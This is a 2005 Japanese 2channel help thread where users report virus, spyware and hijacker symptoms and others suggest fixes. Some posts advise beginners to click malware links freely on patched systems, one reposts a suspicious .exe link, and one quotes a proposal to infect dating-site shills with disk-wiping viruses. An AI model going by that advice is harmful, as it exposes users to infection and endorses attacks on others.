とりあえず心療内科で良いんじゃね?
786名無しさん@お腹いっぱい。:2005/12/12(月) 14:25:25
( ^3^)≡○
787名無しさん@お腹いっぱい。:2005/12/12(月) 19:44:31
【使用OS】 Windows2000
【WindowsUpdateしてるか】いいえ。
【AntiVirusは何を使っているか】 Norton Antivirus Corporate Edition
【ちゃんとUpdateしてるか】 いいえ。
【スキャンした結果(ウイルス名・発見場所)】
ウィルス名: JS.WindowBomb
File: C:\Documents and Settings\Administrator\Application Data\Microsoft\IMJP8\imjp8u.dic
Location: C:\Documents and Settings\Administrator\Application Data\Microsoft\IMJP8
【症状を具体的に、分かる限りすべて書く】 いまのところ発症していません。
【何をしたらそんなことになったのか】 わからない
【これまでにとった措置】
対処法をぐぐって発見し、Intelligent Updtaterでウィルス定義を更新したのですが対象をスキャンしなおしてもなにもでてきません。
親から譲り受けたのでCorporate Editionなのが問題なのかと思うのですが何か有効な手段はないでしょうか?
788名無しさん@お腹いっぱい。:2005/12/12(月) 20:54:18
>>787
WindowsUpdateとアンチウイルスの定義を最新にしてからまたレスしなよ。
789名無しさん@お腹いっぱい。:2005/12/12(月) 20:59:18
>>787
WindowsUpdateとアンチウイルスの定義を最新にするまえに、
OSを再インストールして、ファイアーウォールを入れ、ネットに繋いで
サービスパック当てたほうがいいかも。

もしくは、サービスパックをDLしておいて、詳しくは↓
ttp://www.higaitaisaku.com/cleaninst.html
790787:2005/12/12(月) 21:40:58
>>788-789
ありがとうございます。Windows Updateはやったし、ウィルス定義も最新のものにしたのですが結局うまくいきませんでした・・・
Live UpdaterからならUpdateできるのにNortonからUpdateしようとすると更新リストは取得?できないし;;
再インストールを試してみます、、、
791名無しさん@お腹いっぱい。:2005/12/13(火) 21:17:55
初心者です
さっき専ブラで2ちゃんを見てたらいきなり
ノートンがウィルスを検出しましたって出て、修復できませんでした
って出たけど、私のパソコンは感染されちゃったんですか?
だとしたらまず何をすれば良いのですか?
792名無しさん@お腹いっぱい。:2005/12/13(火) 21:22:52
>>791
とりあえず、ビックリしないこと。深呼吸する。
ウィルスの名前を確認。
専ブラということだけど、どこかURLをクリックしたり、ギコナビでURLを触れてしまったとき
ノートンが反応したなら→全体的にウィルススキャン
掲示板に貼られているウィルスコードに反応しただけなら、このスレの最初の方を読むとか
【ノートン】インターネットセキュリティ Ver.79【2006】
http://pc8.2ch.net/test/read.cgi/sec/1133673099/
793名無しさん@お腹いっぱい。:2005/12/13(火) 21:45:00
>>792
URLに触れたり開いてはいないので、たぶんウィルスコードに反応したのだと思います…
下記のアドレスに行ってみます
794名無しさん@お腹いっぱい。:2005/12/13(火) 22:55:43
先ほどハードディスクの空き領域が6GBだったのが
急にディスク領域不足の警告が出て調べて見たら残りのディスク領域が
100MBくらいしかなくなっていたのですがこのような
症状のウィルスはあるのでしょうか?
795名無しさん@お腹いっぱい。:2005/12/13(火) 23:37:22
ちゃんと書けよ
【使用OS】
【WindowsUpdateしてるか】
【AntiVirusは何を使っているか】
【ちゃんとUpdateしてるか】
【スキャンした結果(ウイルス名・発見場所)】
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】
【何をしたらそんなことになったのか】
【これまでにとった措置】
【その他の質問】
796名無しさん@お腹いっぱい。:2005/12/13(火) 23:37:53
きっとWinnyで5.9GBの大物がキャッシュ変換されたんだよ
797名無しさん@お腹いっぱい。:2005/12/13(火) 23:55:42
【使用OS】 Ny
【WindowsUpdateしてるか】1980年からしていません
【AntiVirusは何を使っているか】 マカフィーの最初に発売したバージョン
【ちゃんとUpdateしてるか】 出来ません
【スキャンした結果(ウイルス名・発見場所)】 わかりません
【別のオンラインスキャンしたならその結果は】 わかりません
【症状を具体的に、分かる限りすべて書く】 急にディスク領域不足の警告が出て調べて見たら残りのディスク領域が
100MBくらいしかなくなっていたのですがこのような
【何をしたらそんなことになったのか】 Ny
【これまでにとった措置】 見ていただけ
【その他の質問】 バカかなあ
798名無しさん@お腹いっぱい。:2005/12/13(火) 23:57:06
いいねぇ・・・
799名無しさん@お腹いっぱい。:2005/12/14(水) 02:45:37
質問です。
ウインXP、アップデートしてます、マカフィー

ビックローブのウイルスメールチェックサービスに入ってて、
ウイルス(W32.Netsky.P@mm!enc)を駆除してくれているのですが、
もしそのサービスに入ってなくて受信してしまった場合、
いったい何が起こるのか教えて下さい。

複数のアドレスに自動でウイルスメールが送信される場合、
アウトルックのフォルダに保存しているメールにも送信されるのでしょうか?

もしアドレス帳に入っているアドレスのみに送信されるのなら、
それは受信トレイの左下にある連絡先(C)のリストのみで、
フォルダにあるメールのアドレスは大丈夫ということなのでしょうか?
800名無しさん@お腹いっぱい。:2005/12/14(水) 03:07:05
>>799
ttp://www.mcafee.com/japan/security/virN2004.asp?v=W32/Netsky.p@MM
どうやらセキュリティホールを利用して感染するらしいから、
穴がなければ受信して開いても関係ない。

ただし、添付ファイルに.exeや.comなどの拡張子の付いたファイルを実行する場合は注意。
今はプレビーューしただけで感染する穴は全部ふさがれている。
確認されているセキュリティホールとウィルスが攻撃する穴だけどな。
だから、感染しない。
801名無しさん@お腹いっぱい。:2005/12/14(水) 13:48:01
【使用OS】 winXP
【WindowsUpdateしてるか】 はい
【AntiVirusは何を使っているか】 ウイルスバスター2005
【ちゃんとUpdateしてるか】 はい
【スキャンした結果(ウイルス名・発見場所)】 特に何も出ませんでした
【別のオンラインスキャンしたならその結果は】特に何も出ませんでした
【症状を具体的に、分かる限りすべて書く】 何もおこらないです
【何をしたらそんなことになったのか】 パソコンやっていたら
【これまでにとった措置】 パソコンやった
【その他の質問】 死ね

802799:2005/12/14(水) 21:01:46
>>800
ありがとうございます。
それと関係あるかどうか分かりませんが、ウイルスメール来るようになってから、
メールを送信するとき、時々、
「接続しているサーバーは、確認できないセキュリティ証明書を使用してます。
現在のシステム時計または署名ファイルのタイムスタンプで確認すると、
必要な証明書の有効期限が過ぎてます。このサーバーを使用し続けますか?」
と出るのではい(Y)を押してるのですが、大丈夫でしょうか?
803名無しさん@お腹いっぱい。:2005/12/14(水) 22:10:06
初心者です。どうかどうすればよいか教えてください。

【使用OS】 xp
【WindowsUpdateしてるか】 はい
【AntiVirusは何を使っているか】 ノートン
【ちゃんとUpdateしてるか】 はい
【スキャンした結果(ウイルス名・発見場所)】何も出ませんでした
【別のオンラインスキャンしたならその結果は】 何も出ませんでした
【症状を具体的に、分かる限りすべて書く】
  タスクにvirus alert!というのが表示されずっと点滅
  yahooにいこうとするとhttp://www.needupdate.com/にとんでしまう
  SPY AXEってのが勝手にインストールされる

【何をしたらそんなことになったのか】 エロサイト見てたら
【これまでにとった措置】
  SPYBOT SERACH&DESTOYをダウンロードしてスキャンしてみました
804名無しさん@お腹いっぱい。:2005/12/14(水) 23:30:32
【使用OS】XP
【WindowsUpdateしてるか】はい
【AntiVirusは何を使っているか】norton2004
【ちゃんとUpdateしてるか】はい
【スキャンした結果(ウイルス名・発見場所)】C\WINDOWS\Web\related.htm(ブラウザーハイジャッカー)←英語でした
【別のオンラインスキャンしたならその結果は】なし
【症状を具体的に、分かる限りすべて書く】firefoxにホームページを登録してもabout:blankに戻ってしまう。
【何をしたらそんなことになったのか】ふめい(2ch?)
【これまでにとった措置】スパイウエア対策ソフトspybotで駆除したがもどらない。
【その他の質問】firefoxを立ち上げるとabout:blankになり面倒です。どなたかお願いいたします。
805名無しさん@お腹いっぱい。:2005/12/15(木) 10:03:38
>>804
起動時に実行されるそれの親玉がソフトでは検出されない。
つまり、実行されてから設定されるレジストリの変更とドロップされるファイルをソフトが検出して削除している。
よって、起動時のメカニズムに詳しくないと削除出来ない。
だから、俺にもどのファイルが元凶なのかは指示出来ない。
806名無しさん@お腹いっぱい。:2005/12/15(木) 10:55:56
>>804
sp2にしてなくてスタートアップ弄る事が出来ないなら
リカバリした方がよいと思う。

つーかspybotでHJブロックしたりスタートアップいじれるんだけど・・・
807名無しさん@お腹いっぱい。:2005/12/15(木) 11:26:29
age
808名無しさん@お腹いっぱい。:2005/12/15(木) 15:09:18
コレなんですか?

648 名前:あちゅ姉[[email protected]] 投稿日:2005/12/15(木) 15:03:48 ID:???
スカに転職したんですが・・・
http://www.guoxuecn.com/photo/*.exe
809名無しさん@お腹いっぱい。:2005/12/15(木) 15:58:47
810名無しさん@お腹いっぱい。:2005/12/15(木) 16:12:57
HDの容量食いつぶすウィルスってありますか?
なんか急に残り容量減った気がするんで
【使用OS】 winXP
【WindowsUpdateしてるか】 はい
【AntiVirusは何を使っているか】 avast!
【ちゃんとUpdateしてるか】 はい
【スキャンした結果(ウイルス名・発見場所)】 特に何も出ませんでした
【別のオンラインスキャンしたならその結果は】してないです
【症状を具体的に、分かる限りすべて書く】 100Gぐらいあったような気がするけど何故か4Gぐらいになった
【何をしたらそんなことになったのか】 原因分かりません
811名無しさん@お腹いっぱい。:2005/12/15(木) 16:52:54
812名無しさん@お腹いっぱい。:2005/12/15(木) 17:17:32
>>811
ありがとうございました
何故かavast4というファイルが100G以上使ってました
削除したら元に戻りました
これウィルスなんでしょうかね?
813名無しさん@お腹いっぱい。:2005/12/15(木) 17:37:44
【使用OS】winXP
【WindowsUpdateしてるか】いいえ
【AntiVirusは何を使っているか】norton2005
【ちゃんとUpdateしてるか】 いいえ
【これまでにとった措置】
手動アップデート(IntelligentUpdater)を実行してみたが更新はされなかった。
【その他の質問】

わたしはAdministrator権限でのログインが禁止されているので、
一般ユーザでLiveUpdateを行いたいのですが、
レジストリの書き換えによってLiveUpdateが可能なのでしょうか?
814MONA ◆ApRjtwCQJQ :2005/12/15(木) 17:53:49
  ∧_∧
 ( ´∀`)  
 (    ) 
 | | |  
 (__)___)

>>813
Update関連が「いいえ」になってるけど、Admin権限を持ってる人は
うpやってないの。
815813:2005/12/15(木) 17:57:33
>>814
Admin権限を持った人は常時いるわけではないので、常に最新の定義ファイルではないんです。
816名無しさん@お腹いっぱい。:2005/12/15(木) 19:25:45
【使用OS】 Win MX SP2
【WindowsUpdateしてるか】 はい!
【AntiVirusは何を使っているか】 P2P
【ちゃんとUpdateしてるか】 はい!
【スキャンした結果(ウイルス名・発見場所)】 Antinny
【別のオンラインスキャンしたならその結果は】 Antinny
【症状を具体的に、分かる限りすべて書く】 ぬるぽと出てきた
【何をしたらそんなことになったのか】 winnyでダウンロードしたファイルを実行した
【これまでにとった措置】 バックアップ取って、パソコンのトラブル解消法をやって、リカバリした
【その他の質問】 リカバリしたらAntinnyって消えるんですね感動しました
817名無しさん@お腹いっぱい。:2005/12/15(木) 21:18:38

【使用OS】winXP
【WindowsUpdateしてるか】はい
【AntiVirusは何を使っているか】AVG
【ちゃんとUpdateしてるか】 はい
【その他の質問】
 あるときからタスクトレイにSQLサーバーのアイコンが出るようになってしまった。
 なんかのソフトのインストールのときか、でもひょっとしたらスパイウェアに
 関係する????

 ともかくいらないので消したいので、アンインストールの方法はありますか?
(プログラムの追加と削除にははいっていない)
818名無しさん@お腹いっぱい。:2005/12/15(木) 22:50:12
>>805-806
サンクス
819名無しさん@お腹いっぱい。:2005/12/15(木) 23:03:36


【使用OS】 WIN XP
【WindowsUpdateしてるか】 はい
【AntiVirusは何を使っているか】マカフィー
【ちゃんとUpdateしてるか】 ハイ
【スキャンした結果(ウイルス名・発見場所)】異常なし
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】 請求画面がいきなり現れます。削除も出来ません
【何をしたらそんなことになったのか】 海外のサイトで無料お試しソフトをダウンロードしたため
【これまでにとった措置】 削除しようとしても支払い方法にリンクしてしまい出来ません

【その他の質問】どうしたらこのソフトを削除できるのでしょうか
お試し期間中に解約しなかったため合法的に請求してるとのことです
パスワードは入れてないはずです

よろしくおねがいします
820名無しさん@お腹いっぱい。:2005/12/15(木) 23:07:19
スパイウェアだろ。HijackThis使え
821名無しさん@お腹いっぱい。:2005/12/15(木) 23:40:41
HijackThis どこでゲットできるんですか?
オソレスすいません

ヒントだけでも教えていただけませんか?
822名無しさん@お腹いっぱい。:2005/12/15(木) 23:50:47
823名無しさん@お腹いっぱい。:2005/12/15(木) 23:51:16
あ、すいません、ぐぐったらでてきました
>>820サンのおかげでたすかりそうです、ありがとーございましたーーー!!!
824名無しさん@お腹いっぱい。:2005/12/15(木) 23:51:19
>>821
Merijn.org
ttp://www.spywareinfo.com/~merijn/index.html

ここがオリジナルだと思う
得られたログの自動解析は下のサイトでできる

HijackThis log file analysis
ttp://hijackthis.de/
825名無しさん@お腹いっぱい。:2005/12/15(木) 23:52:52
おおーレスしてくれていたとは、早速試しますです、
アリガタヤアリガタヤ
826名無しさん@お腹いっぱい。:2005/12/16(金) 09:07:18
ウイルスを駆除したいけど、常駐ソフトの存在を避けたい場合

ウイルス駆除→ソフトアンインストール→ウイルス駆除→ソフトアンインストール

あまりよくない事だとは思うのですが、ウイルスなんてそんな溜まらないだろうし
何より低スペックPCなので常駐ソフトは避けたいんです・・・
これは正解なのでしょうか
827名無しさん@お腹いっぱい。:2005/12/16(金) 09:12:15
すいません↑スルーしてください
828名無しさん@お腹いっぱい。:2005/12/16(金) 09:13:27
>>826
セーフモードで起動してスキャン
829名無しさん@お腹いっぱい。:2005/12/16(金) 11:15:16
一台のHDDを:Cと:Dに分割して使っています。
ウイルスに感染してOSを再インストールする場合、
:Dにあるデータは残りますが、ここにウイルスが入ることはあるのでしょうか?
830MONA ◆ApRjtwCQJQ :2005/12/16(金) 15:27:56
  ∧_∧
 ( ´∀`)  
 (    ) 
 | | |  
 (__)___)

>>829
可能性は当然あると思うよ。
実際にあなたの身に起きるかどうかはわかりませんが。

※参考
http://hotwired.goo.ne.jp/news/technology/story/20051007302.html
http://japan.cnet.com/news/tech/story/0,2000047674,20086884,00.htm
http://www.iodata.jp/news/2005/11/200511info.htm
831名無しさん@お腹いっぱい。:2005/12/16(金) 17:02:22
EICAR以外で安全なテストに使えるウィルスってあります?
832名無しさん@お腹いっぱい。:2005/12/16(金) 17:24:59
>>831
WindowsUpdateでセキュリティパッチを適用していれば、
.exe以外のほとんどのファイル。
エロサイトを開けば古いセキュリティホールを攻撃するウィルスを仕込んでいるサイトが山ほどある。
どうせ感染などしないんだから、リンクをガンガンクリックすればよい。
833名無しさん@お腹いっぱい。:2005/12/16(金) 18:23:03
質問なのですが・・・
来年より、パソコンで株の売買をしたいと思っています。
ウイルスやスパイウエア等の対策はどうすればよろしいでしょうか?
初心者ですので、よろしくお願いします。
834名無しさん@お腹いっぱい。:2005/12/16(金) 18:47:25
>>833
Windowsの自動更新を有効にする
ウイルス対策ソフト・スパイウェア対策ソフトは必須(知識に自信が無ければ市販品を使うこと)
ダウンロードしたファイルを実行するときは本当に信用して良いかしっかり考える
IE以外のブラウザを使う(もちろん更新があったらこまめにアップデート)
みだりにリンクをクリックしない
IEでエロサイト見に行くなんて言語道断
HTMLメールはテキストモードで表示させる
メール文中のリンクは信用せず、自分の手で該当サイトのトップページを表示させて目的のページまでリンクを辿る
表示されているページのアドレスをこまめに確認するクセをつける
個人情報を入力するときは、信用できる証明書で暗号化されて送信されるようになっている事を確認する
画面上にメッセージが表示されたときはメッセージを良く読んでOKするかキャンセルするか決める
いつまでも初心者なんて言ってないでセキュリティの知識を仕入れる

欲を言えば、安いので良いからこれらを徹底した取引専用PCでしか取引しない
これなら完璧。
835名無しさん@お腹いっぱい。:2005/12/16(金) 19:08:36
あ、>>834に追加。
PC直繋ぎせずにルーターを入れる
当然、P2Pソフト(Winnyとか)なんて入れること自体考えもしない
使うときは一般ユーザーを作っておいてそれを使う
836名無しさん@お腹いっぱい。:2005/12/16(金) 19:09:41
>834
ご親切に、早速のご返信ありがとうございます。

@ソフトはノートンインタネットセキュリティ 2004 を中古でもらいました
 これをインストールしとけば、ウイルスとスパイの対応はOKでよろしいでしょうか?

Aインターネットエキスプローラ(IE)以外のプラウザってあるのですか?
インターネットはIEでしか使ったことありません

他は了解しました。


837名無しさん@お腹いっぱい。:2005/12/16(金) 19:12:10
>835 ルーターは明日にでも買ってきます 何度もありがと
838名無しさん@お腹いっぱい。:2005/12/16(金) 19:28:17
>>834は現状のIEの安全性を確認していないからわからないんだな。
まさしくセキュリティ情報誌ガイドラインそのものだ。
悔しかったら、WindowsUpdateで最新にしたらウィルスに感染するスレのリンクでも全部踏んで来い。
その際に、対策ソフトは一切無効にしておく事。
スキャンして、Temporary Internet Filesからウィルスが発見されたら、
俺に文句を言いに来い。
くれぐれも.exeファイルは実行しない事。
これと同じように、現在OEでメールをプレビューしただけで感染するウィルスなどもない。
839名無しさん@お腹いっぱい。:2005/12/16(金) 19:28:31
>>836
中古のノートンって、もしかして前の人が一年使ったあとじゃないかな?
それだと厳密には契約違反。
あと、ノートンの2004だと多分スパイウェア対策としては不十分。
大手のウイルス対策ソフトが本格的にスパイウェア対策打ち出してきたのは最近だから。

スパイウェア対策
http://www.geocities.jp/primarystage/spyware.html
↑は無料ばっかりだけど、市販品もいろいろ。


ブラウザ関係
http://www6.plala.or.jp/rac/tabbrowser.htm
http://www.dti.ne.jp/ikiiki/komatta/216/216.html
840名無しさん@お腹いっぱい。:2005/12/16(金) 19:29:50
>>838
ヒント:ゼロデイアタック
841838:2005/12/16(金) 19:30:24
>スキャンして、Temporary Internet Filesからウィルスが発見されたら、
>俺に文句を言いに来い。

間違い
>スキャンして、Temporary Internet Files以外からウィルスが発見されたら、
>俺に文句を言いに来い。
842名無しさん@お腹いっぱい。:2005/12/16(金) 19:33:21
>>841
つーか、文句聞くだけで謝罪も反省もしないんだろ?
843名無しさん@お腹いっぱい。:2005/12/16(金) 19:34:10
>>840
残念だったな。
俺はここ半年ほどの発生ウィルスが利用するセキュリティホールを全部チェックしているけど、
未対応のものは存在しない。
844名無しさん@お腹いっぱい。:2005/12/16(金) 19:35:55
>839
ありがと、いろいろ難しいですねw
ノートン譲渡は違反ですか&不十分ですか、了解しました。
頭痛いですが、勉強してみます。
845名無しさん@お腹いっぱい。:2005/12/16(金) 19:39:21
未対応のセキュリティホールを攻撃するウィルスじゃなくて、
作者は、現状ではセキュリティパッチを解析してからウィルスを作っているじゃんかよ。
発生よりもマイクロソフトの方が早い。
846名無しさん@お腹いっぱい。:2005/12/16(金) 19:46:34
>>843
ttp://itpro.nikkeibp.co.jp/article/NEWS/20051205/225672/
今月の定例WindowsUpdateでようやくパッチが公開された。
847名無しさん@お腹いっぱい。:2005/12/16(金) 19:55:35
>>846
それによって、バッファオーバーフローが発生して、感染した報告はにちゃんねるでも一切報告されていないし、
対策ソフトのベンダーサイトでも一次的にそのセキュリティホールを利用して、
何らかのウィルスをインストールするウィルスの報告もなかった。
また、ウィルスリンクが得意なここの厨房たちが貼ったリンクでも何もインストールはされなかった。
ただ、IEがフリーズしただけ。
848名無しさん@お腹いっぱい。:2005/12/16(金) 19:56:55
>>847
>>843からずいぶんとトーンダウンしているようだが?
それはゼロデイアタックの危険性を否定する根拠になり得るのか?
849名無しさん@お腹いっぱい。:2005/12/16(金) 20:10:18
ttp://www.atmarkit.co.jp/fwin2k/hotfix/hfb20051209/hfb20051209.html

誰か貼ってくれないかなあ?
本当にインストールされるかどうかが楽しみだな。
俺の確かめた限りではフリーズしかしなかった。
850名無しさん@お腹いっぱい。:2005/12/16(金) 20:14:24
>>848
何がゼロデイアタックだよ。
レジストリが改変されるから直ぐに気付くわさ。
851名無しさん@お腹いっぱい。:2005/12/16(金) 20:33:51
「ウイルスに感染する」≠「レジストリが改変される」
メモリ常駐型なら感染するのにレジストリの改変は不要。
再起動すれば消えるけど。
852名無しさん@お腹いっぱい。:2005/12/16(金) 21:11:19
>>851
メモリ常駐型ってのは、どこかに元ファイルがあって常駐プロセスになっているだけじゃないの?
元ファイルは、一時フォルダかどこかにあるはずだぞ。
それが、展開されて実行されているだけだろうよ。
853名無しさん@お腹いっぱい。:2005/12/16(金) 21:16:33
>>852
そう、元ファイルを実行するだけ。
ウイルス対策ソフトのパターンファイルが対応していなければ検出されないし、
レジストリが改変されるからすぐに気付くという発言を否定するには充分。

大体、レジストリが改変されたのに気付いた時点で「既に活動を開始してる」って事だろう。
感染したら気付く、だから問題ないって論法はセキュリティとしてありなのか?
854名無しさん@お腹いっぱい。:2005/12/16(金) 21:31:04
>>853
セキュリティ的にありだろうよ。
何らかのセキュリティホール経由で実行されたのなら仕方がない。
または、何かのインストーラーを実行した結果なら仕方がない。

ファイアーウォールが新しいプロセスの発信を検知する。
または、新しいプロセスの起動に使用者が気付く。

使用者がその際にレジストリの改変箇所を速攻で修復する。
ついでに、それらのファイルも速攻で削除する。
対策ソフトが検知しなくても何の問題もない。
855名無しさん@お腹いっぱい。:2005/12/16(金) 21:36:48
>>854
なるほど、根本的な価値観が違うということがよくわかった。
遠くで幸せになってくれ。
856名無しさん@お腹いっぱい。:2005/12/16(金) 23:29:10
途中からまったく初心者のことを考えない唯我独尊の発言になったな、見るに堪えない
857名無しさん@お腹いっぱい。:2005/12/17(土) 00:06:29
以降ここは議論スレになりました・・・
858名無しさん@お腹いっぱい。:2005/12/17(土) 00:08:23
「お小遣い稼ぎ.txt」というウィルスに感染してしまったのですが、どうすればいいのですか?
859名無しさん@お腹いっぱい。:2005/12/17(土) 14:39:25
華麗にスルー
860名無しさん@お腹いっぱい。:2005/12/17(土) 14:48:54
そうでしゅか(^▽^)
861名無しさん@お腹いっぱい。:2005/12/17(土) 15:06:59
つーか、最近蕎麦大杉。今月に入って20件越えたぞ。
おまいらのところはどれくらい届いてる?
862MONA ◆ApRjtwCQJQ :2005/12/17(土) 15:34:07
  ∧_∧
 ( ´∀`)  
 (    ) 
 | | |  
 (__)___)

最近はMaleareがモジュール化されていて亜種を作りやすいそうですよ。
また、作成ツールなどもオープンソース化の傾向にあるようです。
Undetection Toolなどの情報交換もその筋の世界では盛んに行われてるようです。

http://japan.cnet.com/news/sec/story/0,2000050480,20092422,00.htm
863862:2005/12/17(土) 15:37:07
Maleare:×
Malware:○
864名無しさん@お腹いっぱい。:2005/12/17(土) 22:01:22
exeとtxtが入った圧縮ファイルを解凍しないでノートンでスキャンしたらウィルスが引っかかったのだけど、この場合でもPCは感染してるのですか?
865名無しさん@お腹いっぱい。:2005/12/17(土) 22:13:52
【使用OS】 winXP
【WindowsUpdateしてるか】 はい
【AntiVirusは何を使っているか】 ウイルスバスター2005
【ちゃんとUpdateしてるか】 はい
【スキャンした結果(ウイルス名・発見場所)】 特に何も出ませんでした
【別のオンラインスキャンしたならその結果は】特に何も出ませんでした
【症状を具体的に、分かる限りすべて書く】 何もおこらないです
【何をしたらそんなことになったのか】 パソコンやっていたら
【これまでにとった措置】 パソコンやった
【その他の質問】 死ね
866名無しさん@お腹いっぱい。:2005/12/17(土) 22:16:49
ソースネクストのウイルスセキュリティは詐欺だ。
返事も来ないし。金だけ取られた。
手続きしても「ただ今混雑中」と繰り返すだけ、新手の詐欺です。
867名無しさん@お腹いっぱい。:2005/12/17(土) 23:10:38
>>864
「感染」という言葉の定義にもよるな。
まあ、中のexeファイルを実行してないのならウイルスの活動まで至っていないと思われ。
削除して対応終わりでしょ。
一応念のため、削除した後に最新パターンファイルで全ドライブ検索しておけば?
868名無しさん@お腹いっぱい。:2005/12/18(日) 02:37:52
>>867
WinRARで圧縮ファイルの中を見てみたら(開くなので解凍はしてない)exeが入ってたのでノートンでスキャンしてみたのですが…
869名無しさん@お腹いっぱい。:2005/12/18(日) 04:08:26
解凍ソフトにセキュリティホールがなければ、解凍したって問題なんかない。
出て来たexeファイルを実行しなきゃ感染などしない。
単に実行するとシステムにインストールして感染状態になるだけ。
持っているだけなのは、セキュリティソフトが騒いでも単に保菌状態と言う。
そのファイルを削除だけすれば済む。
870名無しさん@お腹いっぱい。:2005/12/19(月) 13:03:51
ちょっと質問させて下さい。
前にサイト見ていてダウンロードしますか?
と出てきたので間違って実行したら、定期的に画面に画像が出てきちゃっています。
それで、その実行しているファイルを突き止めて、削除をしようとしても、書込み禁止になっていないか、
または、ファイルが使用中でないか確認して下さい。ってでて削除できません…
どうやったら、削除出来るか教えて下さい。
871名無しさん@お腹いっぱい。:2005/12/19(月) 14:57:37
Unlocker
872名無しさん@お腹いっぱい。:2005/12/19(月) 18:00:04
出会いサイトのサクラ(男も多い)を撃退するために、
こういうこと出来ますでしょうか?


884 /名無しさん[1-30].jpg 2005/12/19(月) 14:18:39 ID:p8ctzpMY0
だからnyかShareやれよ

886 /名無しさん[1-30].jpg 2005/12/19(月) 15:57:07 ID:hdhAzEWw0
>>884
ウイルスが怖いからやらないんだよ。
HDD全消去とかいう笑えないもんが出回ってるらしいし

891 /名無しさん[1-30].jpg 2005/12/19(月) 17:13:49 ID:bQbYOQ3p0
>>886
それそれ!
そういうウイルスをさ、出会い系のサクラのPCに送り込めないかな?
サクラはヤフーメールとか使うけど、本文中に「○○ちゃんのHP作りました」ってアド書いといて、
相手がクリックすると感染するとか

892 /名無しさん[1-30].jpg 2005/12/19(月) 17:28:07 ID:hdhAzEWw0
そういう技術的なことは他の板で聞いた方がいいぞ。
ここには詳しい人いないだろうし。

893 /名無しさん[1-30].jpg 2005/12/19(月) 17:42:09 ID:dt02vgrF0
山田ウイルスや仁義なきキンタマの方がダメージはでかいだろ
HDDを消去されるだけならある意味まだマシ

894 /名無しさん[1-30].jpg sage 2005/12/19(月) 17:50:53 ID:mAI33Gpe0
どぎつい炉動画見てるスクショと自分の本名や写真が出回ったら最悪だよな
873名無しさん@お腹いっぱい。:2005/12/19(月) 18:59:32
削除依頼しますた
874名無しさん@お腹いっぱい。:2005/12/19(月) 20:25:17
恐らくの話ですが、動作を遅くするexeを二つ見つけました。
DDLLLOADRS.exe
msnchecker.exe
上の二つを削除&スタートリストから除去した途端動作が軽くなった気がします。
このexeについて、何かご存知の方はいらっしゃいますか?
875名無しさん@お腹いっぱい。:2005/12/19(月) 20:34:41
>>874
DDLLLOADRS.exeはわからんが、
msnchecker.exeはこんなのが引っ掛かった。
感染してない?
ttp://www.sophos.com/virusinfo/analyses/w32sdbotagb.html
876875:2005/12/19(月) 20:46:57
>>875
MSN Checker というファイル自体HD内に入ってなかったので恐らく感染前に防げたかな・・・と思います。
多分このmsnchecker.exeを実行していたら、感染していたかもしれませんね・・・。
早いご返答ありがとうございました。

DDLLLOADRS.exeのほうは引き続き情報をお待ちしております。
877874:2005/12/19(月) 20:50:32
↑間違えました。
878名無しさん@お腹いっぱい。:2005/12/20(火) 00:08:15
DeltaForce VirusScanOnlineAgentを使っていたら
NETBUSSを検知したとのメッセージがでたけど、どうしていいか調べても分かりませんでした。
誰かどうすべきか教えて下さい。
【使用OS】 winXP
【WindowsUpdateしてるか】 はい
【AntiVirusは何を使っているか】AVG Clamwin spybot search&destroy
【ちゃんとUpdateしてるか】はい
【スキャンした結果(ウイルス名・発見場所)】 特に何も
【別のオンラインスキャンしたならその結果は】特に何も出ませんでした
879名無しさん@お腹いっぱい。:2005/12/20(火) 07:30:21
タスクマネージャで調べたら怪しいプロセスがありました。
IoSecShadow.exe ってなんなんでしょうか?
ググっても出ずこんな物がタスクマネージャに出た事は今までなかったので
相当気になります。
スパイウェアでしょうか?
880名無しさん@お腹いっぱい。:2005/12/20(火) 07:32:59
レス番632って何なんでしょうか?
壊れてますと書かれてますが
多分コレにノートンが反応して
色々いじらないと閲覧できなくなります。
881名無しさん@お腹いっぱい。:2005/12/20(火) 08:26:40
882名無しさん@お腹いっぱい。:2005/12/20(火) 14:34:12
>>879
マルチ乙
883名無しさん@お腹いっぱい。:2005/12/20(火) 18:22:45
>>880
このアドレスを踏んだらトロイに感染したので、どうすれば駆除できるかと書かれていて、
そのURLが書いてあるだけだけど。
884名無しさん@お腹いっぱい。:2005/12/20(火) 19:04:47
此方で質問してもよいものかわかりませぬがよろしいでしょうか
ワークグループでPanda WebAdmin Antivirusの導入を検討しているのですが
当方この辺の事にさっぱり疎く、どういうものなのかと

0:ここにソフトウェアをインストールしていないコンピュータを接続し
1:外部に接続した場合、このコンピュータはチェックの対象になるのか
  WebAdmin側でアクセス制限を設けた場合、このマシンにも規制が適応されるのか
2:IPアドレス-アクセスログを残す事が出来るか
  ソフトをインストしていないマシンのアクセスログは残す事ができるのか

HPを読み漁ってはみたものの、その辺の詳細が記載されていないようで
なかなか問い合わせもしづらい内容なもので、どうしたもんかと
現状として
・個人持込のマシンも多数あるため、強制的にソフトのインストは避けたい
・個人マシンの為、アクセスログが残るのであれば、なるべく余計なlogは残したくない
・一斉にアクセス制限はかけたいが、制限を解除したい場合がある
885名無しさん@お腹いっぱい。:2005/12/20(火) 19:06:37
すれ違いでしたら出来れば誘導もお願いいたしたいのですが
886名無しさん@お腹いっぱい。:2005/12/20(火) 20:36:49
887こう:2005/12/20(火) 22:52:45
ネットをしていたら急にノートンが起動してリモートコンピュータにアクセスしようとしていますみたいなのが無限にでてきて困っています。。これはういるすなのでしょうか?対処法を教えてください!
888名無しさん@お腹いっぱい。:2005/12/20(火) 23:18:17
そして888
889名無しさん@お腹いっぱい。:2005/12/20(火) 23:47:54
アドバイスお願いします。

漫画喫茶のパソコンからカードで買い物をし、
帰り際、もしやと思いフリーのソフトで
スキャンしたところ、キーロガーが検出されて、今、半パニックです。

漏れた可能性のある情報は
・住所氏名生年月日
・プロバイダと携帯のメールアドレス
・カード番号
・ニフティのIDとパスワード
です。

帰宅後、変更できるものは変更しましたが、
カード番号は対応方法が分かりません。
カード会社のWeb上で利用額をチェックできるように
先ほど登録しましたが、リアルタイムで利用額が
反映されないので、いまの段階では情報が漏れたか
どうかすら分かりません。

キーロガーが仕込まれていた場合、100%情報漏れするのでしょうか?
(カード番号はいつもの癖で、適当な数字を入れたあと、デリートして正しい番号を
入力するやり方をしたのですが、少しは意味ありますか?)
890名無しさん@お腹いっぱい。:2005/12/20(火) 23:54:05
>>889
アドバイスにはならんがすまん
